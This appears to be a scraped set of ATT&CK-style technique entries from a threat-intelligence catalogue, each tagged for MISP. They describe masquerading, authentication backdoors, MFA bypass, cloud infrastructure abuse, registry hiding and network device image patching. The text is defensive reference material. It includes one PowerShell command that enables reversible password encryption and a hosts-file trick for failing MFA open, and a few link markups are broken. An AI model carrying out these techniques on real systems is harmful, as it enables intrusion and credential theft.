Adversaries may abuse the RTLO character as a means of tricking a user into executing what they think is a benign file type. A common use of this technique is with [Spearphishing Attachment](Malicious File(https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) since it can trick both end users and defenders if they are not aware of how their tools display and render the RTLO character. Use of the RTLO character has been seen in many targeted intrusion attempts and criminal activity.<sup>[[Trend Micro PLEAD RTLO](https://app.tidalcyber.com/references/9a052eba-1708-44c9-a20f-8b4ef208fa14)]</sup><sup>[[Kaspersky RTLO Cyber Crime](https://app.tidalcyber.com/references/38fbd993-de98-49e9-8437-bc6a1493d6ed)]</sup> RTLO can be used in the Windows Registry as well, where regedit.exe displays the reversed characters but the command line tool reg.exe does not by default.

The tag is: misp-galaxy:technique="Right-to-Left Override"

Space after Filename

Adversaries can hide a program’s true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system.

For example, if there is a Mach-O executable file called <code>evil.bin</code>, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to <code>evil.txt</code>, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to <code>evil.txt </code> (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed <sup>[[Mac Backdoors are back](https://app.tidalcyber.com/references/c37f00dc-ee53-4be1-9046-0a28bdc5649a)]</sup>.

Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.

The tag is: misp-galaxy:technique="Space after Filename"

Masquerading

Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.

Renaming abusable system utilities to evade security monitoring is also a form of [Masquerading]([LOLBAS Main Site(https://app.tidalcyber.com/references/615f6fa5-3059-49fc-9fa4-5ca0aeff4331)]</sup> Masquerading may also include the use of [Proxy](https://app.tidalcyber.com/technique/ba6a869a-c870-4be6-bc08-e078f0efdc3b) or VPNs to disguise IP addresses, which can allow adversaries to blend in with normal network traffic and bypass conditional access policies or anti-abuse protections.

The tag is: misp-galaxy:technique="Masquerading"

Domain Controller Authentication

Adversaries may patch the authentication process on a domain controller to bypass the typical authentication mechanisms and enable access to accounts.

Malware may be used to inject false credentials into the authentication process on a domain controller with the intent of creating a backdoor used to access any user’s account and/or credentials (ex: [Skeleton Key](https://app.tidalcyber.com/software/206453a4-a298-4cab-9fdf-f136a4e0c761)). Skeleton key works through a patch on an enterprise domain controller authentication process (LSASS) with credentials that adversaries may use to bypass the standard authentication system. Once patched, an adversary can use the injected password to successfully authenticate as any domain user account (until the the skeleton key is erased from memory by a reboot of the domain controller). Authenticated access may enable unfettered access to hosts and/or resources within single-factor authentication environments.<sup>[[Dell Skeleton](https://app.tidalcyber.com/references/cea9ce77-7641-4086-b92f-a4c3ad94a49c)]</sup>

The tag is: misp-galaxy:technique="Domain Controller Authentication"

Hybrid Identity

Adversaries may patch, modify, or otherwise backdoor cloud authentication processes that are tied to on-premises user identities in order to bypass typical authentication mechanisms, access credentials, and enable persistent access to accounts.

Many organizations maintain hybrid user and device identities that are shared between on-premises and cloud-based environments. These can be maintained in a number of ways. For example, Azure AD includes three options for synchronizing identities between Active Directory and Azure AD<sup>[[Azure AD Hybrid Identity](https://app.tidalcyber.com/references/b019406c-6e39-41a2-a8b4-97f8d6482147)]</sup>:

  • Password Hash Synchronization (PHS), in which a privileged on-premises account synchronizes user password hashes between Active Directory and Azure AD, allowing authentication to Azure AD to take place entirely in the cloud

  • Pass Through Authentication (PTA), in which Azure AD authentication attempts are forwarded to an on-premises PTA agent, which validates the credentials against Active Directory

  • Active Directory Federation Services (AD FS), in which a trust relationship is established between Active Directory and Azure AD

AD FS can also be used with other SaaS and cloud platforms such as AWS and GCP, which will hand off the authentication process to AD FS and receive a token containing the hybrid users’ identity and privileges.

By modifying authentication processes tied to hybrid identities, an adversary may be able to establish persistent privileged access to cloud resources. For example, adversaries who compromise an on-premises server running a PTA agent may inject a malicious DLL into the AzureADConnectAuthenticationAgentService process that authorizes all attempts to authenticate to Azure AD, as well as records user credentials.<sup>[[Azure AD Connect for Read Teamers](https://app.tidalcyber.com/references/0b9946ff-8c1c-4d93-8401-e1e4dd186305)]</sup><sup>[[AADInternals Azure AD On-Prem to Cloud](https://app.tidalcyber.com/references/7a6a7ecd-b9c7-4371-9924-34733597556c)]</sup> In environments using AD FS, an adversary may edit the Microsoft.IdentityServer.Servicehost configuration file to load a malicious DLL that generates authentication tokens for any user with any set of claims, thereby bypassing multi-factor authentication and defined AD FS policies.<sup>[[MagicWeb](https://app.tidalcyber.com/references/5b728693-37e8-4100-ac82-b70945113e07)]</sup>

In some cases, adversaries may be able to modify the hybrid identity authentication process from the cloud. For example, adversaries who compromise a Global Administrator account in an Azure AD tenant may be able to register a new PTA agent via the web console, similarly allowing them to harvest credentials and log into the Azure AD environment as any user.<sup>[[Mandiant Azure AD Backdoors](https://app.tidalcyber.com/references/7b4502ff-a45c-4ba7-b00e-ca9f6e9c2ac8)]</sup>

The tag is: misp-galaxy:technique="Hybrid Identity"

Multi-Factor Authentication

Adversaries may disable or modify multi-factor authentication (MFA) mechanisms to enable persistent access to compromised accounts.

Once adversaries have gained access to a network by either compromising an account lacking MFA or by employing an MFA bypass method such as [Multi-Factor Authentication Request Generation](https://app.tidalcyber.com/technique/c0f2efd4-bfc8-43da-9859-14446fb8f289), adversaries may leverage their access to modify or completely disable MFA defenses. This can be accomplished by abusing legitimate features, such as excluding users from Azure AD Conditional Access Policies, registering a new yet vulnerable/adversary-controlled MFA method, or by manually patching MFA programs and configuration files to bypass expected functionality.<sup>[[Mandiant APT42](https://app.tidalcyber.com/references/10b3e476-a0c5-41fd-8cb8-5bfb245b118f)]</sup><sup>[[Azure AD Conditional Access Exclusions](https://app.tidalcyber.com/references/8cfb45ec-b660-4a3a-9175-af4ea01ef473)]</sup>

For example, modifying the Windows hosts file (C:\windows\system32\drivers\etc\hosts) to redirect MFA calls to localhost instead of an MFA server may cause the MFA process to fail. If a "fail open" policy is in place, any otherwise successful authentication attempt may be granted access without enforcing MFA. <sup>[[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)]</sup>

Depending on the scope, goals, and privileges of the adversary, MFA defenses may be disabled for individual accounts or for all accounts tied to a larger group, such as all domain accounts in a victim’s network environment.<sup>[[Russians Exploit Default MFA Protocol - CISA March 2022](https://app.tidalcyber.com/references/00c6ff88-6eeb-486d-ae69-dffd5aebafe6)]</sup>

The tag is: misp-galaxy:technique="Multi-Factor Authentication"

Network Device Authentication

Adversaries may use [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f) to hard code a password in the operating system, thus bypassing of native authentication mechanisms for local accounts on network devices.

[Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) may include implanted code to the operating system for network devices to provide access for adversaries using a specific password. The modification includes a specific password which is implanted in the operating system image via the patch. Upon authentication attempts, the inserted code will first check to see if the user input is the password. If so, access is granted. Otherwise, the implanted code will pass the credentials on for verification of potentially valid credentials.<sup>[[Mandiant - Synful Knock](https://app.tidalcyber.com/references/1f6eaa98-9184-4341-8634-5512a9c632dd)]</sup>

The tag is: misp-galaxy:technique="Network Device Authentication"

Network Provider DLL

Adversaries may register malicious network provider dynamic link libraries (DLLs) to capture cleartext user credentials during the authentication process. Network provider DLLs allow Windows to interface with specific network protocols and can also support add-on credential management functions.<sup>[[Network Provider API](https://app.tidalcyber.com/references/b218434e-4233-5963-824e-50ee32d468ed)]</sup> During the logon process, Winlogon (the interactive logon module) sends credentials to the local mpnotify.exe process via RPC. The mpnotify.exe process then shares the credentials in cleartext with registered credential managers when notifying that a logon event is happening.<sup>[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)]</sup><sup>[[NPPSPY Video](https://app.tidalcyber.com/references/6533d5df-7388-5c59-8c63-0923de34b61d)]</sup><sup>[[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)]</sup>

Adversaries can configure a malicious network provider DLL to receive credentials from mpnotify.exe.<sup>[[NPPSPY](https://app.tidalcyber.com/references/c12bfaf6-4d83-552e-912b-cc55bce85961)]</sup> Once installed as a credential manager (via the Registry), a malicious DLL can receive and save credentials each time a user logs onto a Windows workstation or domain via the NPLogonNotify() function.<sup>[[NPLogonNotify](https://app.tidalcyber.com/references/1fda833e-e543-5e68-a0f5-8a4170dd632a)]</sup>

Adversaries may target planting malicious network provider DLLs on systems known to have increased logon activity and/or administrator logon activity, such as servers and domain controllers.<sup>[[NPPSPY - Huntress](https://app.tidalcyber.com/references/df1f7379-38c3-5ca9-8333-d684022c000c)]</sup>

The tag is: misp-galaxy:technique="Network Provider DLL"

Password Filter DLL

Adversaries may register malicious password filter dynamic link libraries (DLLs) into the authentication process to acquire user credentials as they are validated.

Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as DLLs containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts. Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.

Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made.<sup>[[Carnal Ownage Password Filters Sept 2013](https://app.tidalcyber.com/references/78ed9074-a46c-4ce6-ab7d-a587bd585dc5)]</sup>

The tag is: misp-galaxy:technique="Password Filter DLL"

Pluggable Authentication Modules

Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.<sup>[[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)]</sup><sup>[[Man Pam_Unix](https://app.tidalcyber.com/references/6bc5ad93-3cc2-4429-ac4c-aae72193df27)]</sup><sup>[[Red Hat PAM](https://app.tidalcyber.com/references/3dc88605-64c8-495a-9e3b-e5686fd2eb03)]</sup>

Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.<sup>[[PAM Backdoor](https://app.tidalcyber.com/references/da1ffaf1-39f9-4516-8c04-4a4301e13585)]</sup>

Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.<sup>[[PAM Creds](https://app.tidalcyber.com/references/aa9d5bdd-2102-4322-8736-56db8e083fc0)]</sup><sup>[[Apple PAM](https://app.tidalcyber.com/references/4838a58e-c00d-4b4c-937d-8da5d9f1a4b5)]</sup>

The tag is: misp-galaxy:technique="Pluggable Authentication Modules"

Reversible Encryption

An adversary may abuse Active Directory authentication encryption properties to gain access to credentials on Windows systems. The <code>AllowReversiblePasswordEncryption</code> property specifies whether reversible password encryption for an account is enabled or disabled. By default this property is disabled (instead storing user credentials as the output of one-way hashing functions) and should not be enabled unless legacy or other software require it.<sup>[[store_pwd_rev_enc](https://app.tidalcyber.com/references/d3b9df24-b776-4658-9bb4-f43a2fe0094c)]</sup>

If the property is enabled and/or a user changes their password after it is enabled, an adversary may be able to obtain the plaintext of passwords created/changed after the property was enabled. To decrypt the passwords, an adversary needs four components:

  1. Encrypted password (<code>G$RADIUSCHAP</code>) from the Active Directory user-structure <code>userParameters</code>

  2. 16 byte randomly-generated value (<code>G$RADIUSCHAPKEY</code>) also from <code>userParameters</code>

  3. Global LSA secret (<code>G$MSRADIUSCHAPKEY</code>)

  4. Static key hardcoded in the Remote Access Subauthentication DLL (<code>RASSFM.DLL</code>)

With this information, an adversary may be able to reproduce the encryption key and subsequently decrypt the encrypted password value.<sup>[[how_pwd_rev_enc_1](https://app.tidalcyber.com/references/180246ca-94d8-4c78-894d-ae3b6fad3257)]</sup><sup>[[how_pwd_rev_enc_2](https://app.tidalcyber.com/references/cc08f190-5c17-441c-a6fa-99f8fdb8d1ae)]</sup>

An adversary may set this property at various scopes through Local Group Policy Editor, user properties, Fine-Grained Password Policy (FGPP), or via the ActiveDirectory [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) module. For example, an adversary may implement and apply a FGPP to users or groups if the Domain Functional Level is set to "Windows Server 2008" or higher.<sup>[[dump_pwd_dcsync](https://app.tidalcyber.com/references/bd1d7e75-feee-47fd-abfb-7e3dfc648a72)]</sup> In PowerShell, an adversary may make associated changes to user settings using commands similar to <code>Set-ADUser -AllowReversiblePasswordEncryption $true</code>.

The tag is: misp-galaxy:technique="Reversible Encryption"

Modify Authentication Process

Adversaries may modify authentication mechanisms and processes to access user credentials or enable otherwise unwarranted access to accounts. The authentication process is handled by mechanisms, such as the Local Security Authentication Server (LSASS) process and the Security Accounts Manager (SAM) on Windows, pluggable authentication modules (PAM) on Unix-based systems, and authorization plugins on MacOS systems, responsible for gathering, storing, and validating credentials. By modifying an authentication process, an adversary may be able to authenticate to a service or system without using [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406).

Adversaries may maliciously modify a part of this process to either reveal credentials or bypass authentication mechanisms. Compromised credentials or access may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access and remote desktop.

The tag is: misp-galaxy:technique="Modify Authentication Process"

Create Cloud Instance

An adversary may create a new instance or virtual machine (VM) within the compute service of a cloud account to evade defenses. Creating a new instance may allow an adversary to bypass firewall rules and permissions that exist on instances currently residing within an account. An adversary may [Create Snapshot](https://app.tidalcyber.com/technique/bcaf63dc-660a-40d4-ba28-fc113b34bf51) of one or more volumes in an account, create a new instance, mount the snapshots, and then apply a less restrictive security policy to collect [Data from Local System](https://app.tidalcyber.com/technique/c0e4f97b-f651-493f-9636-6ac2f6fb46fb) or for [Remote Data Staging]([Mandiant M-Trends 2020(https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

Creating a new instance may also allow an adversary to carry out malicious activity within an environment without affecting the execution of current running instances.

The tag is: misp-galaxy:technique="Create Cloud Instance"

Create Snapshot

An adversary may create a snapshot or data backup within a cloud account to evade defenses. A snapshot is a point-in-time copy of an existing cloud compute component such as a virtual machine (VM), virtual hard drive, or volume. An adversary may leverage permissions to create a snapshot in order to bypass restrictions that prevent access to existing compute service infrastructure, unlike in [Revert Cloud Instance](https://app.tidalcyber.com/technique/d1836637-e61d-42bb-9067-b325a201b7c7) where an adversary may revert to a snapshot to evade detection and remove evidence of their presence.

An adversary may [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88), mount one or more created snapshots to that instance, and then apply a policy that allows the adversary access to the created instance, such as a firewall policy that allows them inbound and outbound SSH access.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

The tag is: misp-galaxy:technique="Create Snapshot"

Delete Cloud Instance

An adversary may delete a cloud instance after they have performed malicious activities in an attempt to evade detection and remove evidence of their presence. Deleting an instance or virtual machine can remove valuable forensic artifacts and other evidence of suspicious behavior if the instance is not recoverable.

An adversary may also [Create Cloud Instance](https://app.tidalcyber.com/technique/2ba8a662-6930-4cbe-9e3d-4cbe2109fd88) and later terminate the instance after achieving their objectives.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

The tag is: misp-galaxy:technique="Delete Cloud Instance"

Modify Cloud Compute Configurations

Adversaries may modify settings that directly affect the size, locations, and resources available to cloud compute infrastructure in order to evade defenses. These settings may include service quotas, subscription associations, tenant-wide policies, or other configurations that impact available compute. Such modifications may allow adversaries to abuse the victim’s compute resources to achieve their goals, potentially without affecting the execution of running instances and/or revealing their activities to the victim.

For example, cloud providers often limit customer usage of compute resources via quotas. Customers may request adjustments to these quotas to support increased computing needs, though these adjustments may require approval from the cloud provider. Adversaries who compromise a cloud environment may similarly request quota adjustments in order to support their activities, such as enabling additional [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f) without raising suspicion by using up a victim’s entire quota.<sup>[[Microsoft Cryptojacking 2023](https://app.tidalcyber.com/references/e2dbc963-b913-5a44-bb61-88a3f0d8d8a3)]</sup> Adversaries may also increase allowed resource usage by modifying any tenant-wide policies that limit the sizes of deployed virtual machines.<sup>[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)]</sup>

Adversaries may also modify settings that affect where cloud resources can be deployed, such as enabling [Unused/Unsupported Cloud Regions](https://app.tidalcyber.com/technique/edf9f7d7-bc14-4e25-800d-f508acb580d4). In Azure environments, an adversary who has gained access to a Global Administrator account may create new subscriptions in which to deploy resources, or engage in subscription hijacking by transferring an existing pay-as-you-go subscription from a victim tenant to an adversary-controlled tenant.<sup>[[Microsoft Peach Sandstorm 2023](https://app.tidalcyber.com/references/84d026ed-b8f2-5bbb-865a-2d93aa4b2ef8)]</sup> This will allow the adversary to use the victim’s compute resources without generating logs on the victim tenant.<sup>[[Microsoft Azure Policy](https://app.tidalcyber.com/references/761d102e-768a-5536-a098-0b1819029d33)]</sup> <sup>[[Microsoft Subscription Hijacking 2022](https://app.tidalcyber.com/references/e5944e4c-76c6-55d1-97ec-8367b7f98c28)]</sup>

The tag is: misp-galaxy:technique="Modify Cloud Compute Configurations"

Revert Cloud Instance

An adversary may revert changes made to a cloud instance after they have performed malicious activities in attempt to evade detection and remove evidence of their presence. In highly virtualized environments, such as cloud-based infrastructure, this may be accomplished by restoring virtual machine (VM) or data storage snapshots through the cloud management dashboard or cloud APIs.

Another variation of this technique is to utilize temporary storage attached to the compute instance. Most cloud providers provide various types of storage including persistent, local, and/or ephemeral, with the ephemeral types often reset upon stop/restart of the VM.<sup>[[Tech Republic - Restore AWS Snapshots](https://app.tidalcyber.com/references/bfe848a3-c855-4bca-a6ea-44804d48c7eb)]</sup><sup>[[Google - Restore Cloud Snapshot](https://app.tidalcyber.com/references/ffa46676-518e-4fef-965d-e91efae95dfc)]</sup>

The tag is: misp-galaxy:technique="Revert Cloud Instance"

Modify Cloud Compute Infrastructure

An adversary may attempt to modify a cloud account’s compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.

Permissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.<sup>[[Mandiant M-Trends 2020](https://app.tidalcyber.com/references/83bc9b28-f8b3-4522-b9f1-f43bce3ae917)]</sup>

The tag is: misp-galaxy:technique="Modify Cloud Compute Infrastructure"

Modify Registry

Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.

Access to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) may be used for local or remote Registry modification. <sup>[[Microsoft Reg](https://app.tidalcyber.com/references/1e1b21bd-18b3-4c77-8eb8-911b028ab603)]</sup> Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.

Registry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://app.tidalcyber.com/software/d796615c-fa3d-4afd-817a-1a3db8c73532) or other utilities using the Win32 API. <sup>[[Microsoft Reghide NOV 2006](https://app.tidalcyber.com/references/42503ec7-f5da-4116-a3b3-a1b18a66eed3)]</sup> Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. <sup>[[TrendMicro POWELIKS AUG 2014](https://app.tidalcyber.com/references/4a42df15-4d09-4f4f-8333-2b41356fdb80)]</sup> <sup>[[SpectorOps Hiding Reg Jul 2017](https://app.tidalcyber.com/references/877a5ae4-ec5f-4f53-b69d-ba74ff9e1619)]</sup>

The Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. <sup>[[Microsoft Remote](https://app.tidalcyber.com/references/331d59e3-ce7f-483c-b77d-001c8a9ae1df)]</sup> Often [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are required, along with access to the remote system’s [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd) for RPC communication.

The tag is: misp-galaxy:technique="Modify Registry"

Downgrade System Image

Adversaries may install an older version of the operating system of a network device to weaken security. Older operating system versions on network devices often have weaker encryption ciphers and, in general, fewer/less updated defensive features. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

On embedded devices, downgrading the version typically only requires replacing the operating system file in storage. With most embedded devices, this can be achieved by downloading a copy of the desired version of the operating system file and reconfiguring the device to boot from that file on next system restart. The adversary could then restart the device to implement the change immediately or they could wait until the next time the system restarts.

Downgrading the system image to an older versions may allow an adversary to evade defenses by enabling behaviors such as [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4). Downgrading of a system image can be done on its own, or it can be used in conjunction with [Patch System Image](https://app.tidalcyber.com/technique/630a17c1-0176-4764-8f5c-a83f4f3e980f).

The tag is: misp-galaxy:technique="Downgrade System Image"

Patch System Image

Adversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.<sup>[[Killing the myth of Cisco IOS rootkits](https://app.tidalcyber.com/references/538070d6-fbdb-4cc9-8ddf-c331e4375cfb)]</sup> <sup>[[Killing IOS diversity myth](https://app.tidalcyber.com/references/19d7ccc6-76ed-4b12-af50-f810fbc22037)]</sup> <sup>[[Cisco IOS Shellcode](https://app.tidalcyber.com/references/55a45f9b-7be4-4f1b-8b19-a0addf9da8d8)]</sup> <sup>[[Cisco IOS Forensics Developments](https://app.tidalcyber.com/references/95fdf251-f40d-4f7a-bb12-8762e9c961b9)]</sup> <sup>[[Juniper Netscreen of the Dead](https://app.tidalcyber.com/references/3b87bd85-c6dd-4bd9-9427-33b5bd84db4a)]</sup> Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.

To change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.

To change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.

In the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.

By modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://app.tidalcyber.com/technique/8cf19b3d-c9fa-4d71-a6ab-dc0e236e57d4), authentication, via [Network Device Authentication](https://app.tidalcyber.com/technique/195aa08b-15fd-4019-b905-8f31bc5e2094), and perimeter defenses, via [Network Boundary Bridging](https://app.tidalcyber.com/technique/091282d8-ef05-487f-93aa-445efaeed71b). Adding new capabilities for the adversary’s purpose include [Keylogging](https://app.tidalcyber.com/technique/7f1798b5-b159-441b-a5ef-3b5c706e1699), [Multi-hop Proxy](https://app.tidalcyber.com/technique/fa05c148-56a0-43ae-b8e4-2d4e91641400), and [Port Knocking](https://app.tidalcyber.com/technique/34a112db-c61d-4ea2-872f-de3fc1af87a3).

Adversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in conjunction with [Downgrade System Image](https://app.tidalcyber.com/technique/49e3504a-e031-45a0-b816-1d3741a78c7f), one example of a compromised system command may include changing the output of the command that shows the version of the currently running operating system. By patching the operating system, the adversary can change this command to instead display the original, higher revision number that they replaced through the system downgrade.

When the operating system is patched in storage, this can be achieved in either the resident storage (typically a form of flash memory, which is non-volatile) or via [TFTP Boot](https://app.tidalcyber.com/technique/6f2186f3-c798-46e8-a26f-ae033822837b).

When the technique is performed on the running operating system in memory and not on the stored copy, this technique will not survive across reboots. However, live memory modification of the operating system can be combined with [ROMMONkit](https://app.tidalcyber.com/technique/b9d60848-388e-444c-9f22-2267ea61b5e9) to achieve persistence.

The tag is: misp-galaxy:technique="Patch System Image"

Modify System Image

Adversaries may make changes to the operating system of embedded network devices to weaken defenses and provide new capabilities for themselves. On such devices, the operating systems are typically monolithic and most of the device functionality and capabilities are contained within a single file.

To change the operating system, the adversary typically only needs to affect this one file, replacing or modifying it. This can either be done live in memory during system runtime for immediate effect, or in storage to implement the change on the next boot of the network device.

The tag is: misp-galaxy:technique="Modify System Image"

Multi-Factor Authentication Interception

Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms.

If a smart card is used for multi-factor authentication, then a keylogger will need to be used to obtain the password associated with a smart card during normal use. With both an inserted card and access to the smart card password, an adversary can connect to a network resource using the infected system to proxy the authentication with the inserted hardware token. <sup>[[Mandiant M Trends 2011](https://app.tidalcyber.com/references/563be052-29ac-4625-927d-84e475ef848e)]</sup>

Adversaries may also employ a keylogger to similarly target other hardware tokens, such as RSA SecurID. Capturing token input (including a user’s personal identification code) may provide temporary access (i.e. replay the one-time passcode until the next value rollover) as well as possibly enabling adversaries to reliably predict future authentication values (given access to both the algorithm and any seed values used to generate appended temporary codes). <sup>[[GCN RSA June 2011](https://app.tidalcyber.com/references/40564d23-b9ae-4bb3-8dd1-d6b01163a32d)]</sup>

Other methods of MFA may be intercepted and used by an adversary to authenticate. It is common for one-time codes to be sent via out-of-band communications (email, SMS). If the device and/or service is not secured, then it may be vulnerable to interception. Service providers can also be targeted: for example, an adversary may compromise an SMS messaging service in order to steal MFA codes sent to users’ phones.<sup>[[Okta Scatter Swine 2022](https://app.tidalcyber.com/references/66d1b6e2-c069-5832-b549-fc5f0edeed40)]</sup>

The tag is: misp-galaxy:technique="Multi-Factor Authentication Interception"

Multi-Factor Authentication Request Generation

Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.

Adversaries in possession of credentials to [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) may be unable to complete the login process if they lack access to the 2FA or MFA mechanisms required as an additional credential and security control. To circumvent this, adversaries may abuse the automatic generation of push notifications to MFA services such as Duo Push, Microsoft Authenticator, Okta, or similar services to have the user grant access to their account.

In some cases, adversaries may continuously repeat login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls, potentially resulting in the user finally accepting the authentication request in response to “MFA fatigue.”<sup>[[Russian 2FA Push Annoyance - Cimpanu](https://app.tidalcyber.com/references/ad2b0648-b657-4daa-9510-82375a252fc4)]</sup><sup>[[MFA Fatigue Attacks - PortSwigger](https://app.tidalcyber.com/references/1b7b0f00-71ba-4762-ae81-bce24591cff4)]</sup><sup>[[Suspected Russian Activity Targeting Government and Business Entities Around the Globe](https://app.tidalcyber.com/references/f45a0551-8d49-4d40-989f-659416dc25ec)]</sup>

The tag is: misp-galaxy:technique="Multi-Factor Authentication Request Generation"

Multi-Stage Channels

Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.

Remote access tools will call back to the first-stage command and control server for instructions. The first stage may have automated capabilities to collect basic host information, update tools, and upload additional files. A second remote access tool (RAT) could be uploaded at that point to redirect the host to the second-stage command and control server. The second stage will likely be more fully featured and allow the adversary to interact with the system through a reverse shell and additional RAT features.

The different stages will likely be hosted separately with no overlapping infrastructure. The loader may also have backup first-stage callbacks or [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1) in case the original first-stage communication path is discovered and blocked.

The tag is: misp-galaxy:technique="Multi-Stage Channels"

Native API

Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.<sup>[[NT API Windows](https://app.tidalcyber.com/references/306f7da7-caa2-40bf-a3db-e579c541eeb4)]</sup><sup>[[Linux Kernel API](https://app.tidalcyber.com/references/0a30d54e-187a-43e0-9725-3c80aa1c7619)]</sup> These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.

